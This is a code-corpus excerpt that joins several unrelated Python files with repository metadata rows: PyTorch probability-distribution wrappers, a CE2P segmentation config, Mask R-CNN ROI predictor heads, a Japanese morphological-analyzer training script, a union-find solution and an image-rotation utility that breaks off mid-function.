            diagnostics.update(create_stats_ordered_dict(label, ptu.get_numpy(tensor)))
        return diagnostics
class MultivariateDiagonalNormal(TorchDistributionWrapper):
    """Diagonal-covariance Gaussian built as ``Independent(Normal(...), 1)``
    so that ``log_prob`` sums over the event (last) dimension."""
    from torch.distributions import constraints
    arg_constraints = {'loc': constraints.real, 'scale': constraints.positive}

    def __init__(self, loc, scale_diag, reinterpreted_batch_ndims=1):
        dist = Independent(TorchNormal(loc, scale_diag),
                           reinterpreted_batch_ndims=reinterpreted_batch_ndims)
        super().__init__(dist)

    def get_diagnostics(self):
        stats = OrderedDict()
        stats.update(create_stats_ordered_dict(
            'mean',
            ptu.get_numpy(self.mean),
            # exclude_max_min=True,
        ))
        stats.update(create_stats_ordered_dict(
            'std',
            ptu.get_numpy(self.distribution.stddev),
        ))
        return stats

    def __repr__(self):
        # Report the underlying Normal rather than the Independent wrapper.
        return self.distribution.base_dist.__repr__()
@torch.distributions.kl.register_kl(TorchDistributionWrapper,
                                    TorchDistributionWrapper)
def _kl_mv_diag_normal_mv_diag_normal(p, q):
    # Unwrap both wrappers so torch can dispatch on the inner distributions.
    return kl_divergence(p.distribution, q.distribution)
# Independent RV KL handling - https://github.com/pytorch/pytorch/issues/13545
@torch.distributions.kl.register_kl(TorchIndependent, TorchIndependent)
def _kl_independent_independent(p, q):
    # Only defined when both sides reinterpret the same number of batch dims;
    # the base KL is then summed over those reinterpreted dimensions.
    if p.reinterpreted_batch_ndims != q.reinterpreted_batch_ndims:
        raise NotImplementedError
    result = kl_divergence(p.base_dist, q.base_dist)
    return _sum_rightmost(result, p.reinterpreted_batch_ndims)
class GaussianMixture(Distribution):
    """Mixture of diagonal Gaussians with mixing weights shared across the
    event dimension. Parameters are indexed as [batch, dim, component];
    weights are assumed identical along dim (only [:, :, 0] is used)."""
    def __init__(self, normal_means, normal_stds, weights):
        self.num_gaussians = weights.shape[1]
        self.normal_means = normal_means
        self.normal_stds = normal_stds
        self.normal = MultivariateDiagonalNormal(normal_means, normal_stds)
        self.normals = [MultivariateDiagonalNormal(normal_means[:, :, i], normal_stds[:, :, i]) for i in range(self.num_gaussians)]
        self.weights = weights
        self.categorical = OneHotCategorical(self.weights[:, :, 0])

    def log_prob(self, value, ):
        # Per-component log densities, stacked along the last axis.
        log_p = [self.normals[i].log_prob(value) for i in range(self.num_gaussians)]
        log_p = torch.stack(log_p, -1)
        log_weights = torch.log(self.weights[:, :, 0])
        lp = log_weights + log_p
        m = lp.max(dim=1)[0]  # log-sum-exp numerical stability trick
        log_p_mixture = m + torch.log(torch.exp(lp - m[:, None]).sum(dim=1))
        return log_p_mixture

    def sample(self):
        # Sample every component, then select one via a one-hot matmul.
        z = self.normal.sample().detach()
        c = self.categorical.sample()[:, :, None]
        s = torch.matmul(z, c)
        return torch.squeeze(s, 2)

    def rsample(self):
        # Reparameterized component samples; component choice itself is still
        # a non-differentiable categorical draw.
        z = (
            self.normal_means +
            self.normal_stds *
            MultivariateDiagonalNormal(
                ptu.zeros(self.normal_means.size()),
                ptu.ones(self.normal_stds.size())
            ).sample()
        )
        z.requires_grad_()
        c = self.categorical.sample()[:, :, None]
        s = torch.matmul(z, c)
        return torch.squeeze(s, 2)

    def mle_estimate(self):
        """Return the mean of the most likely component.
        This often computes the mode of the distribution, but not always.
        """
        c = ptu.zeros(self.weights.shape[:2])
        # One-hot of the argmax weight per batch row.
        ind = torch.argmax(self.weights, dim=1)  # [:, 0]
        c.scatter_(1, ind, 1)
        s = torch.matmul(self.normal_means, c[:, :, None])
        return torch.squeeze(s, 2)

    def __repr__(self):
        s = "GaussianMixture(normal_means=%s, normal_stds=%s, weights=%s)"
        return s % (self.normal_means, self.normal_stds, self.weights)
# Smoothing constant used by GaussianMixtureFull to keep every mixture weight
# strictly positive (so Categorical/log are well-defined).
epsilon = 0.001
class GaussianMixtureFull(Distribution):
    """Mixture of diagonal Gaussians with per-dimension mixing weights
    (weights indexed [batch, dim, component], smoothed with `epsilon`)."""
    def __init__(self, normal_means, normal_stds, weights):
        self.num_gaussians = weights.shape[-1]
        self.normal_means = normal_means
        self.normal_stds = normal_stds
        self.normal = MultivariateDiagonalNormal(normal_means, normal_stds)
        self.normals = [MultivariateDiagonalNormal(normal_means[:, :, i], normal_stds[:, :, i]) for i in range(self.num_gaussians)]
        # Smooth weights away from zero so log()/Categorical stay defined.
        self.weights = (weights + epsilon) / (1 + epsilon * self.num_gaussians)
        assert (self.weights > 0).all()
        self.categorical = Categorical(self.weights)

    def log_prob(self, value, ):
        # Deliberately disabled below: the shape handling was never finished.
        log_p = [self.normals[i].log_prob(value) for i in range(self.num_gaussians)]
        log_p = torch.stack(log_p, -1)
        log_weights = torch.log(self.weights)
        lp = log_weights + log_p
        m = lp.max(dim=2, keepdim=True)[0]  # log-sum-exp numerical stability trick
        log_p_mixture = m + torch.log(torch.exp(lp - m).sum(dim=2, keepdim=True))
        raise NotImplementedError("from Vitchyr: idk what the point is of "
                                  "this class, so I didn't both updating "
                                  "this, but log_prob should return something "
                                  "of shape [batch_size] and not [batch_size, "
                                  "1] to be in accordance with the "
                                  "torch.distributions.Distribution "
                                  "interface.")
        # NOTE(review): unreachable because of the raise above.
        return torch.squeeze(log_p_mixture, 2)

    def sample(self):
        # Per-dimension component choice: gather the chosen component's value.
        z = self.normal.sample().detach()
        c = self.categorical.sample()[:, :, None]
        s = torch.gather(z, dim=2, index=c)
        return s[:, :, 0]

    def rsample(self):
        # Reparameterized component samples; the categorical draw itself is
        # still non-differentiable.
        z = (
            self.normal_means +
            self.normal_stds *
            MultivariateDiagonalNormal(
                ptu.zeros(self.normal_means.size()),
                ptu.ones(self.normal_stds.size())
            ).sample()
        )
        z.requires_grad_()
        c = self.categorical.sample()[:, :, None]
        s = torch.gather(z, dim=2, index=c)
        return s[:, :, 0]

    def mle_estimate(self):
        """Return the mean of the most likely component.
        This often computes the mode of the distribution, but not always.
        """
        ind = torch.argmax(self.weights, dim=2)[:, :, None]
        means = torch.gather(self.normal_means, dim=2, index=ind)
        return torch.squeeze(means, 2)

    def __repr__(self):
        s = "GaussianMixture(normal_means=%s, normal_stds=%s, weights=%s)"
        return s % (self.normal_means, self.normal_stds, self.weights)
class TanhNormal(Distribution):
    """
    Represent distribution of X where
        X ~ tanh(Z)
        Z ~ N(mean, std)
    Note: this is not very numerically stable.
    """
    def __init__(self, normal_mean, normal_std, epsilon=1e-6):
        """
        :param normal_mean: Mean of the normal distribution
        :param normal_std: Std of the normal distribution
        :param epsilon: Numerical stability epsilon when computing log-prob.
        """
        self.normal_mean = normal_mean
        self.normal_std = normal_std
        self.normal = MultivariateDiagonalNormal(normal_mean, normal_std)
        self.epsilon = epsilon

    def sample_n(self, n, return_pre_tanh_value=False):
        # NOTE(review): relies on torch's sample_n, which newer torch versions
        # deprecate in favor of sample((n,)) -- confirm against the pinned
        # torch version.
        z = self.normal.sample_n(n)
        if return_pre_tanh_value:
            return torch.tanh(z), z
        else:
            return torch.tanh(z)

    def _log_prob_from_pre_tanh(self, pre_tanh_value):
        """
        Adapted from
        https://github.com/tensorflow/probability/blob/master/tensorflow_probability/python/bijectors/tanh.py#L73
        This formula is mathematically equivalent to log(1 - tanh(x)^2).
        Derivation:
        log(1 - tanh(x)^2)
         = log(sech(x)^2)
         = 2 * log(sech(x))
         = 2 * log(2e^-x / (e^-2x + 1))
         = 2 * (log(2) - x - log(e^-2x + 1))
         = 2 * (log(2) - x - softplus(-2x))
        :param value: some value, x
        :param pre_tanh_value: arctanh(x)
        :return:
        """
        # Change-of-variables correction, summed over the event dimension.
        log_prob = self.normal.log_prob(pre_tanh_value)
        correction = - 2. * (
            ptu.from_numpy(np.log([2.]))
            - pre_tanh_value
            - torch.nn.functional.softplus(-2. * pre_tanh_value)
        ).sum(dim=1)
        return log_prob + correction

    def log_prob(self, value, pre_tanh_value=None):
        if pre_tanh_value is None:
            # errors or instability at values near 1
            value = torch.clamp(value, -0.999999, 0.999999)
            # atanh(value) via the identity atanh(x) = (log(1+x) - log(1-x))/2.
            pre_tanh_value = torch.log(1+value) / 2 - torch.log(1-value) / 2
        return self._log_prob_from_pre_tanh(pre_tanh_value)

    def rsample_with_pretanh(self):
        # Reparameterization trick: mean + std * standard-normal noise.
        z = (
            self.normal_mean +
            self.normal_std *
            MultivariateDiagonalNormal(
                ptu.zeros(self.normal_mean.size()),
                ptu.ones(self.normal_std.size())
            ).sample()
        )
        return torch.tanh(z), z

    def sample(self):
        """
        Gradients will and should *not* pass through this operation.
        See https://github.com/pytorch/pytorch/issues/4620 for discussion.
        """
        value, pre_tanh_value = self.rsample_with_pretanh()
        return value.detach()

    def rsample(self):
        """
        Sampling in the reparameterization case.
        """
        value, pre_tanh_value = self.rsample_with_pretanh()
        return value

    def sample_and_logprob(self):
        # Non-differentiable variant: detach both values before scoring.
        value, pre_tanh_value = self.rsample_with_pretanh()
        value, pre_tanh_value = value.detach(), pre_tanh_value.detach()
        log_p = self.log_prob(value, pre_tanh_value)
        return value, log_p

    def rsample_and_logprob(self):
        value, pre_tanh_value = self.rsample_with_pretanh()
        log_p = self.log_prob(value, pre_tanh_value)
        return value, log_p

    @property
    def mean(self):
        # tanh of the pre-squash mean (not the true mean of tanh(Z)).
        return torch.tanh(self.normal_mean)

    def get_diagnostics(self):
        stats = OrderedDict()
        stats.update(create_stats_ordered_dict(
            'mean',
            ptu.get_numpy(self.mean),
        ))
        stats.update(create_stats_ordered_dict(
            'normal/std',
            ptu.get_numpy(self.normal_std)
        ))
        stats.update(create_stats_ordered_dict(
            'normal/log_std',
            ptu.get_numpy(torch.log(self.normal_std)),
        ))
        return stats
| [
"karolhausman@google.com"
] | karolhausman@google.com |
4aa8d69e3fc68379c480897545f8d19475acb2d8 | febeffe6ab6aaa33e3a92e2dbbd75783a4e32606 | /ssseg/cfgs/ce2p/base_cfg.py | 53ab052f882aa2949da132381458f39250509ae2 | [
"MIT"
] | permissive | Junjun2016/sssegmentation | 7bbc5d53abee1e0cc88d5e989e4cff5760ffcd09 | bf7281b369e8d7fc2f8986caaeec3ec38a30c313 | refs/heads/main | 2023-02-04T22:09:13.921774 | 2020-12-23T06:28:56 | 2020-12-23T06:28:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,668 | py | '''base config for ce2p'''
# config for dataset
# (train uses scale/crop/flip/color augmentation; test only resizes+normalizes)
DATASET_CFG = {
    'train': {
        'type': '',
        'set': 'train',
        'rootdir': '',
        'aug_opts': [('Resize', {'output_size': (2048, 512), 'keep_ratio': True, 'scale_range': (0.5, 2.0)}),
                     ('RandomCrop', {'crop_size': (512, 512), 'one_category_max_ratio': 0.75}),
                     ('RandomFlip', {'flip_prob': 0.5}),
                     ('PhotoMetricDistortion', {}),
                     ('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
                     ('ToTensor', {}),
                     ('Padding', {'output_size': (512, 512), 'data_type': 'tensor'}),]
    },
    'test': {
        'type': '',
        'set': 'val',
        'rootdir': '',
        'aug_opts': [('Resize', {'output_size': (2048, 512), 'keep_ratio': True, 'scale_range': None}),
                     ('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
                     ('ToTensor', {}),]
    }
}
# config for dataloader
# (the [...][1] indexing selects 'distributed' as the active loader type)
DATALOADER_CFG = {
    'train': {
        'type': ['nondistributed', 'distributed'][1],
        'batch_size': 16,
        'num_workers': 16,
        'shuffle': True,
        'pin_memory': True,
        'drop_last': True,
    },
    'test': {
        'type': ['nondistributed', 'distributed'][1],
        'batch_size': 1,
        'num_workers': 16,
        'shuffle': False,
        'pin_memory': True,
        'drop_last': False,
    }
}
# config for optimizer
# (max_iters/num_iters/num_epochs are None placeholders filled in at runtime)
OPTIMIZER_CFG = {
    'type': 'sgd',
    'sgd': {
        'learning_rate': 0.01,
        'momentum': 0.9,
        'weight_decay': 5e-4,
    },
    'max_epochs': 0,
    'params_rules': {},
    'policy': {
        'type': 'poly',
        'opts': {'power': 0.9, 'max_iters': None, 'num_iters': None, 'num_epochs': None}
    },
    'adjust_period': ['iteration', 'epoch'][0],
}
# config for losses
# (one cross-entropy term per decoder stage plus the edge branch)
LOSSES_CFG = {
    'loss_cls_stage1': {
        'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
    },
    'loss_cls_stage2': {
        'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
    },
    'loss_edge': {
        'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
    }
}
# config for model
# (num_classes = -1 is a placeholder overridden by dataset-specific configs)
MODEL_CFG = {
    'type': 'ce2p',
    'benchmark': True,
    'num_classes': -1,
    'align_corners': False,
    'is_multi_gpus': True,
    'distributed': {'is_on': True, 'backend': 'nccl'},
    'norm_cfg': {'type': 'syncbatchnorm', 'opts': {}},
    'act_cfg': {'type': 'leakyrelu', 'opts': {'negative_slope': 0.01, 'inplace': True}},
    'backbone': {
        'type': 'resnet101',
        'series': 'resnet',
        'pretrained': True,
        'outstride': 16,
        'is_use_stem': True
    },
    'ppm': {
        'in_channels': 2048,
        'out_channels': 512,
        'pool_scales': [1, 2, 3, 6],
    },
    'epm': {
        'in_channels_list': [256, 512, 1024],
        'hidden_channels': 256,
        'out_channels': 2
    },
    'shortcut': {
        'in_channels': 256,
        'out_channels': 48,
    },
    'decoder':{
        'stage1': {
            'in_channels': 560,
            'out_channels': 512,
            'dropout': 0,
        },
        'stage2': {
            'in_channels': 1280,
            'out_channels': 512,
            'dropout': 0.1
        },
    },
}
# config for common
# (backup/log/result paths are filled in by the runtime scripts)
COMMON_CFG = {
    'train': {
        'backupdir': '',
        'logfilepath': '',
        'loginterval': 50,
        'saveinterval': 1
    },
    'test': {
        'backupdir': '',
        'logfilepath': '',
        'resultsavepath': ''
    }
}
"1159254961@qq.com"
] | 1159254961@qq.com |
05d4e7398b6baf2c1f7de7b84f7a6e0e81cb0afb | d8fa0ed226e6dbc0f607961c8b711362942b120a | /maskrcnn_benchmark/modeling/roi_heads/pred_head/roi_pred_predictors.py | 61f4ef46ed49d5168e57a75390aabcbf51111053 | [] | no_license | ltnghia/video-maskrcnn | 70d003f038f82156ec9a8dca4ce1b8ea1190792c | b0bc8eb8b43a8b45335625525eba620b389ba591 | refs/heads/master | 2021-06-19T11:13:29.058747 | 2021-04-01T02:19:07 | 2021-04-01T02:19:07 | 199,971,172 | 8 | 4 | null | null | null | null | UTF-8 | Python | false | false | 3,052 | py | from maskrcnn_benchmark.modeling import registry
from torch import nn
import math
import torch
from maskrcnn_benchmark.modeling.make_layers import make_fc
@registry.ROI_PRED_PREDICTOR.register("FastRCNNPredictor")
class FastRCNNPredictor(nn.Module):
    """Prediction head for C4-style feature extractors: global-average-pools
    the ROI feature map, then applies a single linear classifier.

    Registered under "FastRCNNPredictor" so it can be selected through
    cfg.MODEL.ROI_PRED_HEAD.PREDICTOR (see make_roi_pred_predictor).
    """
    def __init__(self, cfg, in_channels):
        super(FastRCNNPredictor, self).__init__()
        assert in_channels is not None
        num_inputs = in_channels
        num_classes = cfg.MODEL.ROI_PRED_HEAD.NUM_CLASSES
        # collapse the spatial HxW extent to 1x1 before the classifier
        self.avgpool = nn.AdaptiveAvgPool2d(1)
        # NOTE(review): if num_classes <= 0 no pred_score layer is created,
        # but forward() still calls it -- presumably configs always set a
        # positive class count; confirm.
        if num_classes > 0:
            self.pred_score = make_fc(num_inputs, num_classes, use_gn=False)
            # self.pred_score = nn.Linear(num_inputs, num_classes)
            #
            # nn.init.normal_(self.pred_score.weight, mean=0, std=0.01)
            # nn.init.constant_(self.pred_score.bias, 0)
            if cfg.MODEL.ROI_PRED_HEAD.USE_FOCAL_LOSS:
                # bias_init for sigmoid focal loss: start predictions near
                # the configured prior probability
                prior_prob = cfg.MODEL.ROI_PRED_HEAD.PRIOR_PROB
                bias_value = -math.log((1 - prior_prob) / prior_prob)
                nn.init.constant_(self.pred_score.bias, bias_value)
            elif cfg.MODEL.ROI_PRED_HEAD.USE_CLASS_BALANCE_LOSS:
                # bias_init for class balance loss
                # (NOTE(review): math.log(num_classes - 1) fails when
                # num_classes == 1)
                bias_value = -math.log(num_classes - 1)
                nn.init.constant_(self.pred_score.bias, bias_value)
    def forward(self, x):
        # pool each ROI feature map to a single vector, then classify
        x = self.avgpool(x)
        x = x.view(x.size(0), -1)
        pred_logit = self.pred_score(x)
        return pred_logit
@registry.ROI_PRED_PREDICTOR.register("FPNPredictor")
class FPNPredictor(nn.Module):
    """Prediction head for FPN-style feature extractors: a single
    fully-connected classifier applied to an already-pooled ROI feature
    vector.

    Registered under "FPNPredictor" so it can be selected through
    cfg.MODEL.ROI_PRED_HEAD.PREDICTOR (see make_roi_pred_predictor).
    """
    def __init__(self, cfg, in_channels):
        super(FPNPredictor, self).__init__()
        num_classes = cfg.MODEL.ROI_PRED_HEAD.NUM_CLASSES
        representation_size = in_channels
        # NOTE(review): as in FastRCNNPredictor, num_classes <= 0 leaves
        # pred_score undefined while forward() still uses it; confirm the
        # config always sets a positive value.
        if num_classes > 0:
            self.pred_score = make_fc(representation_size, num_classes, use_gn=False)
            # self.pred_score = nn.Linear(representation_size, num_classes)
            #
            # nn.init.normal_(self.pred_score.weight, std=0.01)
            # nn.init.constant_(self.pred_score.bias, 0)
            if cfg.MODEL.ROI_PRED_HEAD.USE_FOCAL_LOSS:
                # bias_init for sigmoid focal loss
                prior_prob = cfg.MODEL.ROI_PRED_HEAD.PRIOR_PROB
                bias_value = -math.log((1 - prior_prob) / prior_prob)
                nn.init.constant_(self.pred_score.bias, bias_value)
            elif cfg.MODEL.ROI_PRED_HEAD.USE_CLASS_BALANCE_LOSS:
                # bias_init for class balance loss
                bias_value = -math.log(num_classes - 1)
                nn.init.constant_(self.pred_score.bias, bias_value)
    def forward(self, x):
        # a 4D input must already be pooled to 1x1 spatially
        if x.ndimension() == 4:
            assert list(x.shape[2:]) == [1, 1]
            x = x.view(x.size(0), -1)
        scores = self.pred_score(x)
        return scores
def make_roi_pred_predictor(cfg, in_channels):
    """Instantiate the predictor class registered under
    cfg.MODEL.ROI_PRED_HEAD.PREDICTOR."""
    predictor_cls = registry.ROI_PRED_PREDICTOR[cfg.MODEL.ROI_PRED_HEAD.PREDICTOR]
    return predictor_cls(cfg, in_channels)
| [
"trungnghiadk@gmail.com"
] | trungnghiadk@gmail.com |
fdc61ea92d64ff7e6860e3bbbd86c25e0cf2f2b3 | 44e85fa836a4099478a1c17f920cbd9f8b862ccb | /pos_language_model/morph_analyzer_single_counts_main.py | 57721f417c8fff33874a256f2f433158b4fa7c48 | [] | no_license | yukitomo/jp_robust_morphame_analysis | 7da9c4fdb3a743704d2e5f0acfb1a177c031230e | 6ca8b22a08003da7ce32201f9fe7968b92889643 | refs/heads/master | 2021-01-25T07:28:47.093365 | 2015-04-20T23:51:46 | 2015-04-20T23:51:46 | 27,806,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,823 | py | #!/usr/bin/python
#-*-coding:utf-8-*-
#2015-01-31 Yuki Tomo
import pickle
import math
import jctconv
import string
import sys
from collections import defaultdict
from make_dict_obj import Morph
from morph_analizer_counts import *
def main():
    """
    posid_unigram_freq : frequency of each POS tag
    posid_bigram_freq  : frequency of POS-tag bigrams
    posid_word_freq    : frequency of (POS tag, word) pairs

    Initial values
        P(c_i|c_i-1) = freq(c_i|c_i-1) / freq(c_i-1)
        P(v|c) = freq(v|c) / freq(c)

    Error-model initial value 0.01
        P(w|v) = 0.01
        P(v|v) = 0.99

        v -> w : hold the expansion patterns as initial values.
        freq(w|v) : held as zero-frequency values derived from the mecab
                    dictionary readings.

    Training procedure
        1. Load the frequencies counted from mecab analyses (freq_d)
            freq(c)_d, freq(v)_d
            freq(c_i|c_i-1)_d, freq(v|c)_d
        2. Compute the probabilities (precomputed up front)
            P(c_i|c_i-1), P(v|c)
        3. Analyse error sentences with the current parameters and update
           the counts (freq_e)
            freq(c)_e, freq(v)_e
            freq(c_i|c_i-1)_e, freq(v|c)_e
            freq(w|v)_e
        4. Recompute the probabilities (only those whose denominators changed)
            P(c_i|c_i-1), P(v|c)
            P(w|v)
        5. Repeat steps 3 and 4

    input : a file containing many erroneous Japanese sentences
    """
    # -------------------------- initial setup --------------------------
    # load the POS-id definitions and the reading/pronunciation dictionary
    dict_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/data/mecab-ipadic-2.7.0-20070801-utf8/"
    pkl_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/pkl_data/"
    id_def = load_2colums(open(dict_dir + "left-id.def","r")," ") # mecab uses the same IDs for right and left contexts
    read_pron_dic = pickle.load(open(pkl_dir + "ipadic_read_pron_dict.pkl", "r"))
    # 1. load the initial frequencies freq_d
    # Mainichi newspaper counts
    pkl_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/pkl_data/"
    c_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_unigram_counts.pkl","r")) #freq(c)
    cc_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_bigram_counts.pkl","r")) #freq(c_i|c_i-1)
    vc_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_word_counts.pkl","r")) #freq(v|c)
    #for pos, v_dict in vc_freq_d.items():
    #	for v, freq in v_dict.items():
    #		print pos, v, freq
    #for pos, freq in c_freq_d.items():
    #	print pos, freq
    #dict check
    #print cc_freq_d
    #for k1, v1 in cc_freq_d.items():
    #	for k2, v2 in v1.items():
    #		if k1 == "B":
    #			print k1,k2,v2
    #print vc_freq_d
    # wv_freq_d: no counts exist yet, so store empty containers for now
    v_freq_d = {}
    wv_freq_d = defaultdict(dict)
    # store the initial frequencies freq_d in a Freq object
    freq_d = Freq(c_freq_d, cc_freq_d, vc_freq_d, wv_freq_d, v_freq_d)
    # initialise freq_e, the counts updated during the E-step
    freq_e = Freq(defaultdict(int), defaultdict(dict), defaultdict(dict), defaultdict(dict), defaultdict(int))
    # 2. compute probabilities from freq_d and convert them to (log) costs
    cc_cost_e = freq_d.calc_cost("cc", 10)
    vc_cost_e = freq_d.calc_cost("vc", 10)
    wv_cost_e = freq_d.calc_cost("wv", 10)
    # store them in a Cost object
    cost_dict = Cost(cc_cost_e, vc_cost_e, wv_cost_e)
    # ------------------ decoding example with the initial model ------------------
    """
	#文の入力
	#input_sent = raw_input('input a sentence\n')
	input_sent = "ごはんをたべる。"
	#ラティスの生成
	lm = Lattice_Maker(cost_dict.vc, read_pron_dic, cost_dict.wv, cost_dict.cc, id_def)
	lattice = lm.create_lattice(input_sent)
	#pickle.dump(lattice, open(pkl_dir + "lattice_gohanwotaberu.pkl","w"))
	#ビタビによる最適な系列の決定
	best_sequence = lm.viterbi(lattice)
	#最適系列の出力
	lm.show_best_sequence(best_sequence)
	#最適系列から得られた頻度
	increase_counts = lm.return_best_sequence_counts(best_sequence)
	#コストの更新
	print increase_counts.show_info()
	[cost_dict, freq_e] = update_cost_freq(cost_dict, freq_e, freq_d, increase_counts)
	cost_dict.show_info()
	"""
    # -----------------------------------------------------------------------
    # ------------------- training ----------------------------------------
    # read the input (the comment in the original says "file input", but the
    # code currently reads a single sentence from stdin)
    input_sent = raw_input('input\n')
    print "input_sent : ", input_sent
    # build the model with the updated costs
    lm = Lattice_Maker(cost_dict, read_pron_dic, id_def)
    # build the lattice
    lattice = lm.create_lattice(input_sent)
    # find the best sequence with Viterbi
    best_sequence = lm.viterbi(lattice)
    # print the best sequence
    lm.show_best_sequence(best_sequence)
    # counts obtained from the best sequence
    increase_counts = lm.return_best_sequence_counts(best_sequence)
    # update the costs
    [cost_dict, freq_e] = update_cost_freq(cost_dict, freq_e, freq_d, increase_counts)
if __name__ == '__main__':
    main()
"over.the.tr0ouble@gmail.com"
] | over.the.tr0ouble@gmail.com |
91e40c70561c19a95bdf6e85872cc990ed29743d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02762/s492187443.py | d50e3beeefcb45621883846f22b51342ddd97ea9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,422 | py | import collections
class UnionFind:
    """Disjoint-set (union-find) with path compression and union by rank.

    Attributes:
        parent: parent[i] is the parent of node i (roots point to themselves).
        rank:   upper bound on the tree height, used to keep unions shallow.
        count:  number of successful unite() calls (= N - #components).
    """
    def __init__(self, N):
        self.parent = [i for i in range(N)]
        self.rank = [0]*N
        # component size, valid when indexed by a root node
        self._size = [1]*N
        self.count = 0
    def root(self, a):
        """Return the representative of a's component (path-compressing)."""
        if self.parent[a]==a:
            return a
        else:
            self.parent[a]=self.root(self.parent[a])
            return self.parent[a]
    def size(self, a):
        """Return the size of a's component.

        The previous implementation was broken: it lacked ``self`` and read
        the undefined globals ``par`` and ``root``; sizes are now tracked
        explicitly in ``self._size``.
        """
        return self._size[self.root(a)]
    def is_same(self, a, b):
        return self.root(a)==self.root(b)
    def unite(self, a, b):
        ra = self.root(a)
        rb = self.root(b)
        if ra == rb: return
        if self.rank[ra] < self.rank[rb]:
            # make ra the surviving (higher-rank) root
            ra, rb = rb, ra
        self.parent[rb] = ra
        self._size[ra] += self._size[rb]
        if self.rank[ra] == self.rank[rb]: self.rank[ra] += 1
        self.count += 1
def main():
    # For each user, print the number of friend-candidate suggestions:
    # (size of the user's friend component) - (direct friends)
    # - (blocked users inside the same component) - 1 (the user themself)
    n,m,k=map(int, input().split())
    friend = [0]*n      # number of direct friendships per user
    fr = UnionFind(n)
    blocklist = [0]*n   # blocks that fall inside the user's own component
    for i in range(m):
        a,b = map(int, input().split())
        fr.unite(a-1,b-1)
        friend[a-1]+=1
        friend[b-1]+=1
    for i in range(k):
        c,d=map(int, input().split())
        # a block only matters when both users share a friend component
        if(fr.root(c-1)==fr.root(d-1)):
            blocklist[c-1]+=1
            blocklist[d-1]+=1
    res = []
    # component sizes, keyed by root representative
    dd = collections.defaultdict(int)
    for i in range(n):
        dd[fr.root(i)]+=1
    for i in range(n):
        res.append(dd[fr.root(i)]- blocklist[i] - friend[i]-1)
    print(*res)
if __name__ == '__main__':
    main()
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
2c36910a906c4c9ba81c09a28d3c666e18ad3e0c | b22e40b12e198af858dbf71cdb85f459314c0e37 | /image_utils.py | c721a20228730f3744ad52aa2f9ebe1448380216 | [] | no_license | gauenk/python_modules | 8b40626b566e4fdd7db6fc830255ed3daa34b039 | 632d4813a8e182c74b950d98f3f5b98732d8d6ad | refs/heads/master | 2020-12-15T16:34:42.542568 | 2020-06-09T15:47:43 | 2020-06-09T15:47:43 | 235,180,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,529 | py | import numpy as np
import cv2
def overflowOnly(coordinate, rows, cols):
    """Fold out-of-frame coordinate components back toward the frame, in place.

    A negative component becomes its magnitude; a component beyond its bound
    (rows for index 0, cols for index 1) becomes (bound - component).
    Components already inside [0, bound] are left untouched.
    """
    for axis, bound in ((0, rows), (1, cols)):
        v = coordinate[axis]
        if v < 0:
            coordinate[axis] = -v
        elif bound < v:
            coordinate[axis] = bound - v
def zeroInTheRegion(coordinate, rows, cols):
    """Zero, in place, any coordinate component already inside its bound
    ([0, rows] for index 0, [0, cols] for index 1)."""
    for axis, bound in ((0, rows), (1, cols)):
        if 0 <= coordinate[axis] <= bound:
            coordinate[axis] = 0
def correctTranslatedIndex(coordinate,rows,cols):
    # normalise a transformed corner, in place: components already inside
    # the frame are zeroed, the remaining out-of-range components are
    # folded back toward the frame
    zeroInTheRegion(coordinate,rows,cols)
    overflowOnly(coordinate,rows,cols)
def getRotationScale(M, rows, cols):
    """Return the shrink factor that keeps an image's corners inside a
    rows x cols frame after applying the affine matrix ``M``.

    Two test corners ((cols,0) and (0,0) in homogeneous form) are
    transformed, normalised via correctTranslatedIndex, and the most
    restrictive per-axis scale is returned.
    """
    a = np.array([cols, 0, 1])
    b = np.array([0, 0, 1])
    ta = np.matmul(M, a)
    tb = np.matmul(M, b)
    correctTranslatedIndex(ta, rows, cols)
    correctTranslatedIndex(tb, rows, cols)
    # shrink factor needed along each axis for each test corner
    scale_a_0 = rows / (2. * np.abs(ta[0]) + rows)
    scale_a_1 = rows / (2. * np.abs(ta[1]) + rows)
    scale_b_0 = cols / (2. * np.abs(tb[0]) + cols)
    scale_b_1 = cols / (2. * np.abs(tb[1]) + cols)
    # the unused intermediate `scale_list` from the original was removed
    return np.min([scale_a_0, scale_a_1, scale_b_0, scale_b_1])
def getRotationInfo(angle, cols, rows):
    """Rotation matrix about the image center plus the shrink factor that
    keeps the rotated image inside the frame."""
    center = (cols / 2, rows / 2)
    unscaled = cv2.getRotationMatrix2D(center, angle, 1.0)
    scale = getRotationScale(unscaled, rows, cols)
    rotationMat = cv2.getRotationMatrix2D(center, angle, scale)
    return rotationMat, scale
def rotateImage(img, angle):
    """Rotate ``img`` about its center by ``angle`` degrees, shrinking so
    the whole frame stays visible.

    :param img: image array (H x W or H x W x C)
    :param angle: rotation in degrees, or False to skip rotation
    :return: (rotated_image, rotateInfo) where rotateInfo is
             [angle, cols, rows, original_shape], or (img, None) when
             angle is False
    """
    # print('angle',angle)
    if angle is False:
        return img, None
    im_shape = img.shape
    rows, cols = img.shape[:2]
    rotationMat, scale = getRotationInfo(angle, cols, rows)
